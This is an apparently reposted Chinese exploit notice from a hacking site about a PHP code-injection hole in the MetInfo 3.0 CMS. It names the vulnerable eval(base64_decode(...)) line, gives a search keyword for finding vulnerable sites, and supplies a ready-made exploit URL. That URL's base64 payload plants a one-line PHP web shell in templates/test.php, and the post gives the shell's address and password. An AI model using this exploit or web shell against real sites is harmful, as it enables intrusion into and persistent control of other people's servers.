MetInfo 3.0 PHP代码注入漏洞(getshell) 来源:本站转载 作者:佚名 时间:2010-11-07 TAG: 我要投稿 官网:http://www.metinfo.cn/ 关键字:"Powered by MetInfo 3.0 " 来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm 描述: 在文件/include/common.inc.php第67行: eval(base64_decode($allclass[0])); $allclass[0] 变量未初始化 ,因此我们可以控制其值,进行代码注入的利用。 POC:http://target.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)] Exploit: http://target.com/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw== base64编码部分内容为fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>'); 一句话后门地址:http://target.com/templates/test.php 密码:c 另一篇文章:http://www.zysafe.com/html/holes/03/2012110838257.html